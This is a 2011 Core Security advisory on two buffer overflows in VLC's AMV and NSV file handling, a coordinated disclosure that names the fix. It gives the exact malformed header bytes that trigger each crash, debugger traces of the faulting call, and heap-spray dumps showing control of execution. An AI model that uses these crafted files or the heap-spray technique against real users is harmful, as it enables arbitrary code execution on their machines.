VLC Vulnerabilities Handling .AMV and .NSV files

1. Advisory Information

Title: VLC Vulnerabilities handling .AMV and .NSV files
Advisory ID: CORE-2011-0208
Advisory URL: http://www.coresecurity.com/core-labs/advisories/vlc-vulnerabilities-amv-nsv-files
Date published: 2011-03-23
Date of last update: 2011-03-23
Vendors contacted: VLC team
Release mode: Coordinated release

2. Vulnerability Information

Class: Buffer overflow [CWE-119], Buffer overflow [CWE-119]
Impact: Code execution
Remotely Exploitable: Yes (client-side)
Locally Exploitable: No
CVE Name: CVE-2010-3275, CVE-2010-3276

3. Vulnerability Description

Two vulnerabilities have been found in VLC media player [1], when handling .AMV and .NSV file formats. These vulnerabilities can be exploited by a remote attacker to obtain arbitrary code execution with the privileges of the user running VLC.

4. Vulnerable packages

VLC 1.1.4
VLC 1.1.5
VLC 1.1.6
VLC 1.1.7
Older versions may be affected, but were not checked.

5. Non-vulnerable packages

VLC 1.1.8

6. Vendor Information, Solutions and Workarounds

These vulnerabilities are fixed in VLC version 1.1.8, which can be downloaded from http://www.videolan.org/

7. Credits

These vulnerabilities were discovered and researched by Ricardo Narvaja from Core Security Technologies. Publication was coordinated by Carlos Sarraute.

8. Technical Description / Proof of Concept Code

8.1. Vulnerability in VLC 1.1.4 to 1.1.7 when handling AMV files [CVE-2010-3275]

This vulnerability was found by fuzzing different formats. In AMV files if the offset 0x41 is changed to a value greater than 90 as shown below:

Offset(h) 00000000 52 49 46 46 00 00 00 00 41 4D 56 20 4C 49 53 54 RIFF....AMV LIST 00000010 
00 00 00 00 68 64 72 6C 61 6D 76 68 38 00 00 00 ....hdrlamvh8... 00000020 24 F4 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 $Ã´.............. 00000030 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 ................ 00000040 A0 A0

Then the program will crash in the following plugin:

Executable modules, item 248 Base=6D680000 Size=00017000 (94208.) Entry=6D6810C0 libdir_1.
<ModuleEntryPoint> Name=libdir_1 Path=C:\Program Files\VideoLAN\VLC\plugins\libdirectx_plugin.dll

More precisely in this location:

6D6812A1 8B10 MOV EDX,DWORD PTR DS:[EAX] 6D6812A3 894C24 04 MOV DWORD PTR SS:[ESP+4],
ECX 6D6812A7 890424 MOV DWORD PTR SS:[ESP],EAX 6D6812AA FF92 80000000 CALL DWORD PTR 
DS:[EDX+80] offset 000006A1 8B10 MOV EDX,DWORD PTR DS:[EAX] 000006A3 894C24 04 MOV 
DWORD PTR SS:[ESP+4],ECX 000006A7 890424 MOV DWORD PTR SS:[ESP],EAX 000006AA FF92 
80000000 CALL DWORD PTR DS:[EDX+80] registers EAX 3DD1255C ECX 00000000 EDX 
3032344A EBX 3DDF9410 ESP 3F82FC04 EBP 3DD1229C ESI 3DD1255C EDI 3DDF90BC 
EIP 6D6812AA libdir_1.6D6812AA

When executing an appropriate heap spray in Internet explorer:

303234CA 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................ 
303234DA 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................ 303234EA 0C 
0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................ 303234FA 0C 0C 0C 0C 0C 0C 
0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................ 3032350A 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 
0C 0C 0C 0C 0C ................ 3032351A 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 
................ 3032352A 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................

We manage to take control of the execution flow and execute our code:

0C0C0C0C 0C 0C OR AL,0C 0C0C0C0E 0C 0C OR AL,0C 0C0C0C10 0C 0C OR AL,0C 0C0C0C12 
0C 0C OR AL,0C 0C0C0C14 0C 0C OR AL,0C 0C0C0C16 0C 0C OR AL,0C 0C0C0C18 0C 0C OR 
AL,0C 0C0C0C1A 0C 0C OR AL,0C 0C0C0C1C 0C 0C OR AL,0C 0C0C0C1E 0C 0C OR AL,0C 
0C0C0C20 0C 0C OR AL,0C 0C0C0C22 0C 0C OR AL,0C 0C0C0C24 0C 0C OR AL,0C 0C0C0C26 0C 0C OR AL,0C

8.2. Vulnerability in VLC 1.1.4 to 1.1.7 when handling NSV files [CVE-2010-3276]

In NSV files when changing the offsets 0x0b to 0x0e as shown below:

Offset(h) 00000000 4E 53 56 73 56 50 33 31 4D 50 33 98 00 99 01 01 NSVsVP31MP3Ëœ.â„¢..

We can make the program crash in the following plugin:

Executable modules, item 248 Base=6D680000 Size=00017000 (94208.) Entry=6D6810C0 libdir_1.
<ModuleEntryPoint> Name=libdir_1 Path=C:\Program Files\VideoLAN\VLC\plugins\libdirectx_plugin.dll

More precisely in this location:

6D6812A1 8B10 MOV EDX,DWORD PTR DS:[EAX] 6D6812A3 894C24 04 MOV DWORD PTR SS:[ESP+4],
ECX 6D6812A7 890424 MOV DWORD PTR SS:[ESP],EAX 6D6812AA FF92 80000000 CALL DWORD PTR DS:
[EDX+80] offset 000006A1 8B10 MOV EDX,DWORD PTR DS:[EAX] 000006A3 894C24 04 MOV DWORD PTR 
SS:[ESP+4],ECX 000006A7 890424 MOV DWORD PTR SS:[ESP],EAX 000006AA FF92 80000000 CALL 
DWORD PTR DS:[EDX+80] registers EAX 37CE12FC ASCII "I420" ECX 00000000 EDX 30323449 EBX 
37D8F268 ESP 3865FC04 EBP 37CE103C ESI 37CE12FC ASCII "I420" EDI 37D8E314 EIP 
6D6812AA libdirec.6D6812AA

When executing an appropriate heap spray in Internet explorer:

303234CA 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................ 303234DA 
0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................ 303234EA 0C 0C 0C 
0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................ 303234FA 0C 0C 0C 0C 0C 0C 
0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................ 3032350A 0C 0C 0C 0C 0C 0C 0C 0C 0C 
0C 0C 0C 0C 0C 0C 0C ................ 3032351A 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 
0C 0C 0C 0C ................ 3032352A 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 
0C ................

We make the execution continue in our code:

0C0C0C0C 0C 0C OR AL,0C 0C0C0C0E 0C 0C OR AL,0C 0C0C0C10 0C 0C OR AL,0C 0C0C0C12 
0C 0C OR AL,0C 0C0C0C14 0C 0C OR AL,0C 0C0C0C16 0C 0C OR AL,0C 0C0C0C18 0C 0C OR 
AL,0C 0C0C0C1A 0C 0C OR AL,0C 0C0C0C1C 0C 0C OR AL,0C 0C0C0C1E 0C 0C OR AL,0C 0C0
C0C20 0C 0C OR AL,0C 0C0C0C22 0C 0C OR AL,0C 0C0C0C24 0C 0C OR AL,0C 0C0C0C26 0C 
0C OR AL,0C

9. Report Timeline

2011-02-08: Core Security Technologies notifies the VLC team of the vulnerabilities. Publication date is temporarily set to February 28, 2011.
2011-02-08: VLC team acknowledges notification and provides PGP keys.
2011-02-09: Core sends a technical description and PoC files that trigger the vulnerabilities.
2011-02-18: Core asks the VLC team whether they could reproduce the vulnerabilities.
2011-02-23: VLC team replies that fixes will be included in VLC 1.1.8, and that they believe the issue is not exploitable.
2011-02-25: Core replies that the issues have been confirmed to be exploitable, and that the researcher has developed fully working exploits. Core offers to reschedule the publication of its advisory to coordinate it with the release of fixes.
2011-03-10: Core requests an update on this issue, since no reply was received. Core notes that the PoC files and exploits were tested on Windows only, and reschedules publication to March 16, stating that the advisory will be published as "user release" if no reply is received.
2011-03-10: VLC team requests two additional weeks for the release of fixes, and asks whether the vulnerabilities are exploitable with ASLR.
2011-03-14: Core agrees to postpone publication, confirms that the bugs are exploitable with ASLR, and requests a concrete date for the release.
2011-03-16: VLC team states that they would like to release on March 23rd.
2011-03-18: Core agrees with the release date.
2011-03-23: Advisory CORE-2011-0208 is published.

10. References

[1] VLC media player http://www.videolan.org/

11. About CoreLabs

CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: https://www.coresecurity.com/core-labs.

12. About Core Security Technologies

Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and prove real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.

Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at: https://www.coresecurity.com.

13. Disclaimer

The contents of this advisory are copyright (c) 2011 Core Security Technologies and (c) 2011 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us

14. PGP/GPG Keys

This advisory has been signed with the GPG key of Core Security Technologies advisories team.